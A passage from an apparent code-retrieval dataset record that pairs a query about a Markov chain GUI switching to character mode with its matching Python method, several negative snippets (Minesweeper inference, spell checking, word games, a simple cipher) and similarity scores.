knowledge that is not empty\n for i in range(len(self.knowledge)):\n for j in range(i + 1, len(self.knowledge)):\n # Now I'll compare knowledge of sentence in i and j\n sentence1 = self.knowledge[i]\n sentence2 = self.knowledge[j]\n\n # First, I check if they are empty\n if sentence1.cells == set():\n to_be_removed.add(i)\n #print('first is empty')\n break\n if sentence2.cells == set():\n to_be_removed.add(j)\n #print('second is empty')\n continue\n # Or equal to each other,\n # Then I remove the sentences\n if sentence1 == sentence2:\n to_be_removed.add(j)\n #print('same')\n continue\n\n # Start to compare using information from cs50\n # The superset will be replaced with newer sentence which is smaller.\n if sentence1.cells.issubset(sentence2.cells):\n # remove the larger set\n to_be_removed.add(j)\n self.knowledge.append(Sentence(sentence2.cells - sentence1.cells, sentence2.count - sentence1.count))\n count += 1\n #print('sentence 1 is subset of sentence 2')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n elif sentence2.cells.issubset(sentence1.cells):\n to_be_removed.add(i)\n self.knowledge.append(Sentence(sentence1.cells - sentence2.cells, sentence1.count - sentence2.count))\n count += 1\n #print('sentence 2 is subset of sentence 1')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n # Now I remove the unnecessary sentences from knowledge\n # From largest\n for index in sorted(list(to_be_removed))[::-1]:\n self.knowledge.pop(index)",
"def isWordSet(self):\n return len(self.getWord()) != 0",
"def setWordKnown(self):\n self.wordKnown = ''.join(['_ ' if w not in self.guessedRight else w for w in self.getWord()])",
"def clean_duplicate_words(words):\n clean_words = []\n state = np.ones(len(words))\n while state.any():\n base_idx = state.nonzero()[0][0]\n for idx in range(len(words)):\n base_word = words[base_idx]\n new_word = words[idx]\n\n # if 2 different words (both still viable) intersect\n if idx != base_idx and state[idx] and \\\n CharNetRunner._do_words_intersect(base_word, new_word):\n # decide if to keep left/right word\n if base_word.text_score > new_word.text_score:\n state[idx] = False\n else:\n state[base_idx] = False\n break\n\n # if all other intersections were less accurate\n if state[base_idx]:\n clean_words.append(words[base_idx])\n state[base_idx] = False\n return clean_words",
"def propose(self):\n\n\n fb = 0.0\n changed_any = False\n\n while not changed_any:\n new = copy(self) ## Now we just copy the whole thing\n\n for w in self.all_words():\n if flip(self.propose_p):\n try:\n xp, xfb = self.get_word(w).propose()\n\n changed_any = True\n new.set_word(w, xp)\n fb += xfb\n\n except ProposalFailedException:\n pass\n\n\n return new, fb",
"def process(self, message, **kwargs):\n\n spc = SpellChecker()\n res = word_tokenize(message.text)\n [print(\"before -> \", word) for word in res]\n\n new_words = []\n for word in res:\n new_words.append(spc.correction(word))\n [print(\"after -> \", spc.correction(word)) for word in res]\n\n message.text = untokenize(new_words)\n message.set(\"text\", message.text, True)\n print(\"The corrected sentence -> \", untokenize(new_words))",
"def get_related_words(initial_words, model):\n \n unseen = initial_words\n \n seen = defaultdict(int)\n \n max_size = 1000 # could be greater\n \n while unseen and len(seen) < max_size:\n if len(seen) % 50 == 0: \n print('seen length : {}'.format(len(seen)))\n \n node = unseen.pop(0)\n \n new_expanding = [w for w, s in model.most_similar(node, topn=20)]\n \n unseen += new_expanding\n \n seen[node] += 1\n \n # optimal: 1. score function could be revised\n # optimal: 2. using dymanic programming to reduce computing time\n \n return seen",
"def get_related_words(initial_words, model):\n \n unseen = initial_words\n \n seen = defaultdict(int)\n \n max_size = 1000 # could be greater\n \n while unseen and len(seen) < max_size:\n if len(seen) % 50 == 0: \n print('seen length : {}'.format(len(seen)))\n \n node = unseen.pop(0)\n \n new_expanding = [w for w, s in model.most_similar(node, topn=20)]\n \n unseen += new_expanding\n \n seen[node] += 1\n \n # optimal: 1. score function could be revised\n # optimal: 2. using dymanic programming to reduce computing time\n \n return seen",
"def __spellCheck(self):\n aw = self.activeWindow()\n if aw:\n aw.checkSpelling()",
"def keep_words(self, idx):\n print('{} words have been removed'.format(self.data.shape[1] - len(idx)))\n self.data = self.data[:, idx]\n self.vocab = [self.vocab[i] for i in idx]",
"def validate_words(self):\n if not self.words or not self.mnemonic.check(self.words):\n raise InvalidWords",
"def getWord(self, input_sentence, prev_word = None):\n\n all_words = torch.zeros(0, dtype=torch.long)\n all_probs = torch.zeros(0, dtype=torch.float32)\n\n for i in range(15):\n observe_word = input_sentence[i]\n words, probs = self.factors[i].observe(observe_word)\n probs *= self.weights[i]\n\n # join factors\n all_words, idx = torch.unique(torch.cat((all_words, words)), return_inverse = True)\n concat_probs = torch.cat((all_probs, probs))\n new_probs = torch.zeros_like(all_words, dtype=torch.float32)\n\n for j in range(concat_probs.size(0)):\n new_probs[idx[j]] += concat_probs[j]\n all_probs = new_probs\n\n\n if torch.is_tensor(prev_word):\n words, probs = self.transition.observe(prev_word)\n # join factors\n all_words, idx = torch.unique(torch.cat((all_words, words)), return_inverse = True)\n concat_probs = torch.cat((all_probs, probs))\n new_probs = torch.zeros_like(all_words, dtype=torch.float32)\n for j in range(concat_probs.size(0)):\n new_probs[idx[j]] += concat_probs[j]\n all_probs = new_probs\n\n # now all_words and all_probs contains all posible words with its probability\n try:\n chosen_idx = torch.argmax(all_probs)\n result = all_words[chosen_idx]\n if int(result) == UNK_ID:\n all_probs[chosen_idx] = 0\n chosen_idx = torch.argmax(all_probs)\n result = all_words[chosen_idx]\n _, idxx = torch.sort(all_probs, descending=False)\n print(all_probs[idxx[:10]])\n print(all_words[idxx[:10]])\n print(result)\n except:\n result = input_sentence[self.output_idx]\n\n \n \n return result",
"def save(self, *args, **kwargs):\n good_list = []\n for word in self.words.lower().split('\\n'):\n word = word.strip()\n if word and word not in good_list:\n good_list.append(word)\n self.words = '\\n'.join(good_list)\n return super(WordSet, self).save(*args, **kwargs)",
"def _warm_cache(self):\n for word, index in self.word_to_index.items():\n self.embedding_layer.weight.data[index].copy_(torch.from_numpy(self.embedder.get_word_vector(word)))",
"def filterPossibleWords(self): \r\n filledInSpaces = []\r\n for i in range(len(self.currentBoard)):\r\n if self.currentBoard[i] != '_':\r\n filledInSpaces.append( (i, self.currentBoard[i]) )\r\n \r\n self.wordList = list(filter(lambda word: self.viableWord(word, filledInSpaces), self.wordList))",
"def solve(self):\n \n self.action_button.config(state = DISABLED)\n \n self.get_grid()\n resultdict = self.logic.solve()\n for word in resultdict:\n if resultdict[word]:\n self.word_search_grid[resultdict[word][0]][resultdict[word][1]].entry[\"fg\"] = \"red\"",
"def _add_text(self, elem):\n words = WORD_SEPARATORS.split(elem.string.lower())\n for word in words:\n word = word.strip()\n if word in self._ignored_words:\n continue\n self._curr_words.append((self.word_id(word), self._font_size))\n\n \"\"\" Update inverted index \"\"\"\n if self.word_id(word) in self._inverted_index:\n self._inverted_index[self.word_id(word)].add(self._curr_doc_id)\n self._resolved_inverted_index[word].add(self._curr_url)\n\n else:\n self._inverted_index[self.word_id(word)] = {self._curr_doc_id}\n self._resolved_inverted_index[word] = {self._curr_url}",
"def computeTF(self):\n for word in self.dictionary:\n self.dictionary[word].setTF(self.getTotalTerms())",
"def this_word(self):\n self.append = self.add_to_current_word",
"def isGoalState(self, state):\n wds = get_words(state)\n # checks if every word in corpus - USELESS/Possible damage\n # for i in range(len(wds)):\n # if (self.bigramCost(wds[i], self.not_word) >= self.threshold):\n # return False\n for i in range(len(wds)):\n if (wds[i] not in self.fills[i]):\n return False\n return True",
"def constitute_word_dict(self):\r\n\r\n #IS THIS NECESSARY WITH DATABASE??\r\n\r\n if self.using_shelf:\r\n for k_temp in self.get_words():\r\n self.delete_word(k_temp)\r\n\r\n for i_temp in [a_temp for a_temp in self.indexes()\r\n if Index(a_temp) > Index(str(0))]:\r\n\r\n self.add_search_words(Index(i_temp),\r\n self.get_text_from_note(i_temp))\r\n display.noteprint((alerts.ATTENTION,\r\n alerts.WORD_DICT_CONSTITUTED))",
"def word_length_check(self):\r\n \r\n for word in self.all_words:\r\n if len(word) == len(self.best_guess):\r\n self.valid_words.add(word)",
"def add_knowledge(self, cell, count):\n \n self.moves_made.add(cell)\n\n # Marking a cell safe\n\n if cell not in self.safes: \n self.mark_safe(cell)\n\n \n # Getting all nearby cells\n\n nearby = self.nearby_cells(cell) \n\n nearby -= self.safes | self.moves_made \n\n new_sentence = Sentence(nearby, count)\n\n self.knowledge.append(new_sentence)\n\n new_safes = set()\n new_mines = set()\n\n for sentence in self.knowledge:\n \n if len(sentence.cells) == 0:\n self.knowledge.remove(sentence)\n \n else:\n tmp_new_safes = sentence.known_safes()\n tmp_new_mines = sentence.known_mines()\n\n \n if type(tmp_new_safes) is set:\n new_safes |= tmp_new_safes\n\n \n if type(tmp_new_mines) is set:\n new_mines |= tmp_new_mines\n\n \n for safe in new_safes:\n self.mark_safe(safe)\n\n \n for mine in new_mines:\n self.mark_mine(mine)\n\n \n\n prev_sentence = new_sentence\n\n new_inferences = []\n\n for sentence in self.knowledge:\n if len(sentence.cells) == 0:\n self.knowledge.remove(sentence)\n\n elif prev_sentence == sentence:\n break\n elif prev_sentence.cells <= sentence.cells:\n inf_cells = sentence.cells - prev_sentence.cells\n inf_count = sentence.count - prev_sentence.count\n\n new_inferences.append(Sentence(inf_cells, inf_count))\n\n prev_sentence = sentence\n\n self.knowledge += new_inferences"
] |
[
"0.6143838",
"0.5924507",
"0.5841545",
"0.56694335",
"0.5658453",
"0.56565875",
"0.5607831",
"0.55883926",
"0.55284345",
"0.54901344",
"0.5477555",
"0.54664123",
"0.54603267",
"0.54457223",
"0.54457223",
"0.54229975",
"0.5419326",
"0.5410536",
"0.54028875",
"0.5382244",
"0.5360501",
"0.53305423",
"0.53219754",
"0.5304177",
"0.52965087",
"0.5291152",
"0.52773964",
"0.5266801",
"0.52645624",
"0.52557635"
] |
0.7139649
|
0
|
Has this GUI's Markov Chain recompute itself to work with individual characters.
|
def set_markov_chain_to_chars(self):
self.markov_chain.recompute_markov_chain_with_chars()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def recompute_markov_chain(self):\n new_order = int(self.order_selection.get())\n if new_order != self.markov_chain.order:\n self.markov_chain.recompute_markov_chain(new_order)",
"def set_markov_chain_to_words(self):\n self.markov_chain.recompute_markov_chain_with_words()",
"def _apply_character_maskings(self):\n for permutation in self.permutations:\n for char_symbol in self.characters.keys():\n for i in permutation.find_all(\"character-link\", ref=char_symbol): \n i.string.replace_with(self.characters[char_symbol])\n\n self.plain_text = \" \".join([permuation.description.text for permuation in self.permutations])\n self.reapply_plain_text_editing()",
"def redo_possibles(self):\n self.remove_possibles()\n self.set_possible()\n self.show_possibles()",
"def retranslate(self):\r\n pass",
"def retranslate(self):\r\n pass",
"def reconChar(PiksList, high):\n position, h=PiksList[0]\n NewPiksList=[]\n \n for piks in PiksList: ##delete all pixels that can not be in tile\n if piks[0]<position+high-1:\n NewPiksList.append(piks)\n \n PiksList=NewPiksList\n \n Char=CharFrame(high,high) ##create new CharFrame object \n for el in PiksList: \n Char.putPixel(el[0]-position,el[1])\n CharScaled=Char\n CharScaled.reScale(30,30) ##skale CharFrame object to the ending size\n return PiksList, CharScaled\n ##this is not testet yet because of not working neuralNetwork\n \"\"\"if CharScaled.getOutput():\n return PiksList, CharScaled\n else:\n prop=[[],[],[]]\n histo=Char.vLinesHistogram()\n for i in range(0, len(histo)):\n if histo[i]<=3:\n prop[histo[i]-1].append(i)\n for proposition in prop:\n proposition.reverse()\n CharPro=copy.deepcopy(Char)\n PiksListPro=copy.deepcopy(PiksList)\n for kolumn in proposition:\n for el in PiksList: #jeśli nie wymyślimy efektywniejszego sposobu\n if el[1]>=proposition:\n CharPro.makeWhite(position-el[0],el[1])\n PiksListPro.remove(el)\n CharProScaled=copy.deepcopy(CharPro)\n CharProScaled.reScale(20,20)\n if CharProScaled.getOutput():\n return PiksListPro, CharProSlaled\n return PiksList, Char # gdyby to nić nie dało by zwrócić cokolwiek\"\"\"",
"def __init__(self, master):\n self.master = master\n self.master.resizable(False, False)\n self.master.title('Markov Babbler')\n self.markov_chain = mc.MarkovChain()\n\n # Constants\n self.button_height = 2\n self.button_width = 21\n self.button_off_color = 'Light Grey'\n self.button_on_color = 'Dark Grey'\n self.button_column_span = 2\n self.spinbox_length = 3\n self.number_of_sentences = 12\n self.options_column = 11\n self.min_sentence_length = 10\n self.max_sentence_length = 20\n\n # Displays babbler's output\n self.display_frame = tk.Frame(master)\n self.display_frame.grid(row=0, rowspan=12, column=0, columnspan=10)\n\n self.display_scrollbar = tk.Scrollbar(self.display_frame)\n\n self.display = tk.Text(self.display_frame, height=18, width=80, bg='WHITE', borderwidth=3,\n relief=\"groove\", wrap='word')\n self.display.config(yscrollcommand=self.display_scrollbar.set)\n self.display_scrollbar.config(command=self.display.yview)\n self.display.pack(side='left')\n self.display_scrollbar.pack(side='right', fill='y')\n\n # Selects .txt file to add to this window's Markov Chain\n self.select_file = tk.Button(master, text='Add File', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.find_file)\n self.select_file.grid(row=0, column=self.options_column, columnspan=self.button_column_span)\n\n # Adds user entered text to this Markov Chain\n self.user_string_row = 1\n\n self.user_string_entry = tk.Entry(self.master)\n self.user_string_entry.insert(0, 'Add text here!')\n self.user_string_entry.grid(row=self.user_string_row, column=self.options_column)\n\n self.user_string_button = tk.Button(self.master, text='Enter', bg=self.button_off_color,\n activebackground=self.button_on_color, command=self.add_user_text)\n self.user_string_button.grid(row=self.user_string_row, column=self.options_column+1)\n\n # Changes the Markov Chains's order\n self.order_row = 2\n self.order_selection_label = tk.Label(master, text='Markov Chain Order')\n self.order_selection_label.grid(row=self.order_row, column=self.options_column)\n\n self.initial_order_value = tk.StringVar(master)\n self.initial_order_value.set(str(self.markov_chain.order))\n\n self.order_selection = tk.Spinbox(master, values=tuple(range(1, 11)),\n width=self.spinbox_length,\n command=self.recompute_markov_chain)\n self.order_selection.config(textvariable=self.initial_order_value)\n self.order_selection.grid(row=self.order_row, column=self.options_column + 1)\n\n # Select the number sentences for the Markov Chain to output\n self.num_sentences_row = 3\n self.num_sentences_label = tk.Label(master, text='Number of Sentences')\n self.num_sentences_label.grid(row=self.num_sentences_row, column=self.options_column)\n\n self.initial_num_sentences = tk.StringVar(master)\n self.initial_num_sentences.set(str(self.number_of_sentences))\n\n self.num_sentences = tk.Spinbox(master, values=tuple(range(1, 51)),\n width=self.spinbox_length,\n command=self.set_number_of_sentences)\n self.num_sentences.config(textvariable=self.initial_num_sentences)\n self.num_sentences.grid(row=self.num_sentences_row, column=self.options_column + 1)\n\n # Set minimum sentence length for each of the Markov Chain's sentence outputs\n self.min_sentence_row = 4\n\n self.min_sentence_label = tk.Label(master, text='Min Sentence Length')\n self.min_sentence_label.grid(row=self.min_sentence_row, column=self.options_column)\n\n self.initial_min_sentence = tk.StringVar(master)\n self.initial_min_sentence.set(str(self.min_sentence_length))\n\n self.set_min_sentence = tk.Spinbox(master, values=tuple(range(1, 100)),\n width=self.spinbox_length,\n command=self.set_min_sentence_length)\n self.set_min_sentence.config(textvariable=self.initial_min_sentence)\n self.set_min_sentence.grid(row=self.min_sentence_row, column=self.options_column+1)\n\n # Set maximum sentence length for each of the Markov Chain's sentence outputs\n self.max_sentence_row = 5\n\n self.max_sentence_label = tk.Label(master, text='Max Sentence Length')\n self.max_sentence_label.grid(row=self.max_sentence_row, column=self.options_column)\n\n self.initial_max_sentence = tk.StringVar(master)\n self.initial_max_sentence.set(str(self.max_sentence_length))\n\n self.set_max_sentence = tk.Spinbox(master, values=tuple(range(2, 101)),\n width=self.spinbox_length,\n command=self.set_max_sentence_length)\n self.set_max_sentence.config(textvariable=self.initial_max_sentence)\n self.set_max_sentence.grid(row=self.max_sentence_row, column=self.options_column+1)\n\n # Radio buttons controlling if this GUI's Markov Chain should work with words or individual chars.\n self.words_or_char_row = 6\n self.master_variable = tk.StringVar()\n self.words_radio_button = tk.Radiobutton(master, text='Words', variable=self.master_variable, value='a',\n command=self.set_markov_chain_to_words)\n self.chars_radio_button = tk.Radiobutton(master, text='Chars', variable=self.master_variable, value='b',\n command=self.set_markov_chain_to_chars)\n self.words_radio_button.select()\n self.words_radio_button.grid(row=self.words_or_char_row, column=self.options_column)\n self.chars_radio_button.grid(row=self.words_or_char_row, column=self.options_column+1)\n\n # Generates a new batch of output from the Markov Chain, based off current constants like order, min/max\n # sentence length, etc.\n self.generate = tk.Button(master, text=\"Generate Text\", height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.generate_babble_text)\n self.generate.grid(row=7, column=self.options_column, columnspan=self.button_column_span)\n\n # Saves the Markov Chain output last outputted to .txt file\n self.save_file = tk.Button(master, text='Save Text', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.save_babble)\n self.save_file.grid(row=8, column=self.options_column, columnspan=self.button_column_span)",
"def recompute_output_text(self):\r\n s = self.input_string.get()\r\n senc = rotcode.rotate(s,steps=self.steps.get())\r\n if self.reverse_flag.get():\r\n # Reverse the encoded text\r\n senc = senc[::-1]\r\n self.output_string.set(senc)",
"def _characters(self):\n self.characters = list(\n set([item for sublist in self.grid for item in sublist])\n )\n return self.characters",
"def add_knowledge(self, cell, count):\n self.moves_made.add(cell)\n self.mark_safe(cell)\n cells=set()\n #print(\"yo\")\n for i in range(cell[0]-1, cell[0]+2):\n for j in range(cell[1]-1, cell[1]+2):\n if i>=0 and j>=0 and i<self.height and j<self.width:\n if (i,j)==cell:\n continue\n if (i,j) in self.mines:\n count=count-1\n\n elif (i,j) not in self.safes and (i,j) not in self.moves_made:\n cells.add((i,j))\n\n a=Sentence(cells, count)\n r=len(self.knowledge)\n #print(\"go\")\n '''Ignore this code\n while i<r:\n if self.knowledge[i].getcells().issubset(a.cells):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n a=Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount())\n if cells.issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-cells, self.knowledge[i].getcount()-count)\n i+=1\n '''\n self.knowledge.append(a)\n #print(\"no\")\n r=range(len(self.knowledge))\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n r=range(len(self.knowledge))\n\n for i in r:\n for j in range(i+1, len(self.knowledge)):\n if self.knowledge[i].getcells().issubset(self.knowledge[j].getcells()):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n self.knowledge[j]=Sentence(self.knowledge[j].getcells()-self.knowledge[i].getcells(), self.knowledge[j].getcount()-self.knowledge[i].getcount())\n elif self.knowledge[j].getcells().issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-self.knowledge[j].getcells(), self.knowledge[i].getcount()-self.knowledge[j].getcount())\n\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_mines()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n #print(\"mines\",len(self.mines))\n \n #raise NotImplementedError",
"def add_knowledge(self, cell, count):\n # First, just update some basic information\n self.moves_made.add(cell)\n self.mark_safe(cell)\n # Getting the neighbouring cells\n cells = set([])\n for i in range(cell[0] - 1, cell[0] + 2):\n for j in range(cell[1] - 1, cell[1] + 2):\n\n # Ignore the cell itself\n if (i, j) == cell:\n continue\n\n # Update count if cell in bounds and is mine\n if 0 <= i < self.height and 0 <= j < self.width:\n cells.add((i,j))\n # Make sure to eliminate the known safes\n sentence = Sentence(cells - self.safes, count)\n # As well as the known mines\n for mine in self.mines:\n sentence.mark_mine(mine)\n\n # Then the knowledge base is updated\n self.knowledge.append(sentence)\n #for sentence in self.knowledge:\n #print(sentence)\n\n # Now I update the ai's knowledge until no new knowledge is made\n # First I'll check if the sentence is empty, and remove if it is\n count = 1\n # Repeat until no new changes\n while count:\n count = 0\n to_be_removed = set()\n # update any known safes or mines\n self.check_all_mines_safes()\n # Compare every pair of sentence in knowledge that is not empty\n for i in range(len(self.knowledge)):\n for j in range(i + 1, len(self.knowledge)):\n # Now I'll compare knowledge of sentence in i and j\n sentence1 = self.knowledge[i]\n sentence2 = self.knowledge[j]\n\n # First, I check if they are empty\n if sentence1.cells == set():\n to_be_removed.add(i)\n #print('first is empty')\n break\n if sentence2.cells == set():\n to_be_removed.add(j)\n #print('second is empty')\n continue\n # Or equal to each other,\n # Then I remove the sentences\n if sentence1 == sentence2:\n to_be_removed.add(j)\n #print('same')\n continue\n\n # Start to compare using information from cs50\n # The superset will be replaced with newer sentence which is smaller.\n if sentence1.cells.issubset(sentence2.cells):\n # remove the larger set\n to_be_removed.add(j)\n self.knowledge.append(Sentence(sentence2.cells - sentence1.cells, sentence2.count - sentence1.count))\n count += 1\n #print('sentence 1 is subset of sentence 2')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n elif sentence2.cells.issubset(sentence1.cells):\n to_be_removed.add(i)\n self.knowledge.append(Sentence(sentence1.cells - sentence2.cells, sentence1.count - sentence2.count))\n count += 1\n #print('sentence 2 is subset of sentence 1')\n #print('*' * 10)\n #print('sentence 1: ', sentence1)\n #print('sentence 2: ', sentence2)\n #print(\"*\" * 10)\n # Now I remove the unnecessary sentences from knowledge\n # From largest\n for index in sorted(list(to_be_removed))[::-1]:\n self.knowledge.pop(index)",
"def _updateMetric(self, i, char):\n # Set the metric\n if i == 0:\n off = glm.vec2(0., 0.)\n kern = glm.vec2(0.0, 0.0)\n else:\n off = glm.vec2(self._string_metric[i-1][2])\n kern = glm.vec2(self.font.getKerning(self.text[i - 1], char))\n glyph = self.extracted.get(ord(char), None)\n if glyph:\n horz_advance = glyph.get('horz_advance', 0.0)\n else:\n horz_advance = 0.0\n self._lineWidth += horz_advance\n self._labelWidth = max(self._labelWidth, self._lineWidth)\n if char == '\\n':\n off.x = 0.0\n next_char_shift = glm.vec2(off)\n self._lineWidth = 0\n textHeight = self.font.table['linespace']\n next_char_shift.y -= textHeight\n self._labelHeight += textHeight\n else:\n next_char_shift = glm.vec2(off) + glm.vec2(horz_advance, 0) + kern\n self._string_metric = self._string_metric[:i]\n self._string_metric.append((glm.vec2(off), kern, next_char_shift))\n return off, kern",
"def supercombiner(bot, ev):\n # ported from jenni\n s = 'u'\n for i in iter(range(1, 3000)):\n if unicodedata.category(chr(i)) == \"Mn\":\n s += chr(i)\n if len(s) > 100:\n break\n bot.say(s)",
"def step1ab(self):\n\t\tif self.b[self.k] == 's':\n\t\t\tif self.ends(\"sses\"):\n\t\t\t\tself.k = self.k - 2\n\t\t\telif self.ends(\"ies\"):\n\t\t\t\tself.setto(\"i\")\n\t\t\telif self.b[self.k - 1] != 's':\n\t\t\t\tself.k = self.k - 1\n\t\tif self.ends(\"eed\"):\n\t\t\tif self.m() > 0:\n\t\t\t\tself.k = self.k - 1\n\t\telif (self.ends(\"ed\") or self.ends(\"ing\")) and self.vowelinstem():\n\t\t\tself.k = self.j\n\t\t\tif self.ends(\"at\"): self.setto(\"ate\")\n\t\t\telif self.ends(\"bl\"): self.setto(\"ble\")\n\t\t\telif self.ends(\"iz\"): self.setto(\"ize\")\n\t\t\telif self.doublec(self.k):\n\t\t\t\tself.k = self.k - 1\n\t\t\t\tch = self.b[self.k]\n\t\t\t\tif ch == 'l' or ch == 's' or ch == 'z':\n\t\t\t\t\tself.k = self.k + 1\n\t\t\telif (self.m() == 1 and self.cvc(self.k)):\n\t\t\t\tself.setto(\"e\")",
"def __macronize(self):\n self.macronizations = [Scansion(\"\")]\n for i, word in enumerate(self.words):\n new_macrons = []\n for exist in self.macronizations:\n for macrons in word.macronize():\n new_macrons.append(exist + macrons)\n self.macronizations = new_macrons",
"def undo_glycan(self):\n chid = self.chain.get()\n sequon = self.sequon.get()\n self.sequon_colors[sequon] = [.5, .5, .5]\n key = self.sequon.get()\n if key in self.linked_glycanMolecules:\n del self.linked_glycanMolecules[key]\n del self.linked_glycans[key]\n self.draw_glycoprotein(chid)\n self.draw_glycan(sequon)",
"def on_origEdit_textChanged(self):\n self.__updatePronounceButtons()\n self.__updateClearButton()\n self.__updateTranslateButton()",
"def alphabet_press(user_letter_pick):\n # Checks to see if the START NEW GAME button was successfully pressed w/o error\n if lets_begin.winfo_exists() != 1:\n messagebox.showwarning(title=\"Pump the brakes!\", message=\"It appears you've gotten a bit ahead of\\n\"\n \"yourself, though your eagerness is appreciated\\n\"\n \"please follow procedure :\\\\\")\n else:\n attempt = multiple_letters_check(user_letter_pick)\n if attempt == True: # Checks if the user entered the same letter, ignores if it's the first iteration\n global first_strike_through\n first_strike_through = True\n global past_first_iteration\n global make_to_string\n if past_first_iteration == True:\n b_label = []\n blanks = return_to_string # Just giving it a name with better context\n else:\n b_label = []\n blanks = make_to_string\n for n in blanks: # Creating a list of chars from the string of blanks\n b_label += n\n conversion = [] # used to combine the original entry into a string with \" \" in between the chars\n global original_user_entry\n original_entry_length = len(original_user_entry)\n # create a string of the original entry + \" _\"\n for h in range(original_entry_length): # create a string of the original entry + \" \" to gain the length\n conversion.append(\" \")\n conversion.append(original_user_entry[h])\n remove_end_spaces(conversion) # Removes any additional spaces from the end\n remove_double_spaces(conversion) # Removes the space (' ') before any double spaces created by newlines (\\n)\n global game_over\n global correct_guess_count\n global blank_labels\n global new_blank_labels\n good_guess = FALSE\n j = 0\n for letters in conversion: # This loop checks if the user's pick matches any of the letters from the original entry\n if letters == ' ':\n j += 1\n continue # skips an iteration\n if letters == alphabet[user_letter_pick]: # If the user guesses the correct letter\n b_label[j] = alphabet[user_letter_pick] # Assign the letter corresponding spot in the string\n make_to_string = \"\" # resets the variable\n for c in b_label: # this conversion back to a string is to make the labels look better\n make_to_string += c\n new_blank_labels = Label(root, text=make_to_string, bg=\"gray\", fg=\"white\") # Update the Blanks label\n new_blank_labels.grid(row=65, column=9, rowspan=19, columnspan=2, sticky='NESW')\n past_first_iteration = False # Causes make_to_string to hold its value\n good_guess = TRUE # The player guessed the right letter\n correct_guess_count += 1\n if correct_guess_count == length_of_chars_only: # The User wins the game!!\n # Clears this info\n make_to_string = \"\"\n correct_guess_count = 0\n b_label.clear()\n blanks = \"\"\n conversion.clear()\n j = 0\n past_first_iteration = True\n first_strike_through = False\n strike_one.clear()\n winner() # Let's the player know they won and displays the winner graphic\n j += 1\n if good_guess == FALSE: # The player guessed the wrong letter\n game_over += 1\n if game_over >= 6:\n # Clears this info\n make_to_string = \"\"\n b_label.clear()\n blanks = \"\"\n conversion.clear()\n j = 0\n past_first_iteration = True\n first_strike_through = False\n strike_one.clear()\n game_over_remove_labels(game_over) # Removes the labels based on the parameters\n if game_over >= 6:\n game_over = 0\n correct_guess_count = 0\n strike_one.append(user_letter_pick)",
"def update_letters_guessed(self, letter):\n self.letters_guessed = self.letters_guessed + letter",
"def coding():\r\n \r\n key={'reverse_word': False, 'reverse_string': False, 'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd', 'e': 'e', 'f': 'f', 'g': 'g', 'h': 'h',\r\n 'i': 'i', 'j': 'j', 'k': 'j', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', 'q': 'q', 'r': 'r', 's': 's', 't': 't', 'u': 'u',\r\n 'v': 'v', 'w': 'w', 'x':'x', 'y': 'y', 'z': 'z'}\r\n x=0 #determine the sliding of the letters\r\n \r\n def isKeyEmpty(k):\r\n \"\"\"Utility Function that checks if key is empty\"\"\"\r\n if k=={'reverse_word': False, 'reverse_string': False, 'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd', 'e': 'e', 'f': 'f', 'g': 'g', 'h': 'h',\r\n 'i': 'i', 'j': 'j', 'k': 'j', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', 'q': 'q', 'r': 'r', 's': 's', 't': 't', 'u': 'u',\r\n 'v': 'v', 'w': 'w', 'x':'x', 'y': 'y', 'z': 'z'}:\r\n return True\r\n return False\r\n \r\n def set_key(vars): #vars=[0]num,[1]rWord,[2]rString\r\n \"\"\"Function that set the new key\"\"\"\r\n nonlocal key\r\n nonlocal x\r\n x=vars[0]\r\n if (vars[1]=='yes'):\r\n key['reverse_word']=True\r\n if (vars[2]=='yes'):\r\n key['reverse_string']=True\r\n if (x<-26 or x>26):\r\n x=x%26 #makes x to be in range\r\n if (x==0):\r\n x=random.randrange(-26,26) #random number\r\n for i in range (97,123): #26 ABC letters, ASCII value of 'a' is 97 97+26=123\r\n if(i+x>122):\r\n key[chr(i)]=chr(i-25+x)\r\n elif (i+x<97):\r\n key[chr(i)]=chr(i+26+x)\r\n else:\r\n key[chr(i)]=chr(i+x)\r\n print(\"done\")\r\n \r\n def empty_key():\r\n \"\"\"Function makes current key empty\"\"\"\r\n nonlocal key\r\n nonlocal x\r\n x=0\r\n key={'reverse_word': False, 'reverse_string': False, 'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd', 'e': 'e', 'f': 'f', 'g': 'g', 'h': 'h',\r\n 'i': 'i', 'j': 'j', 'k': 'j', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 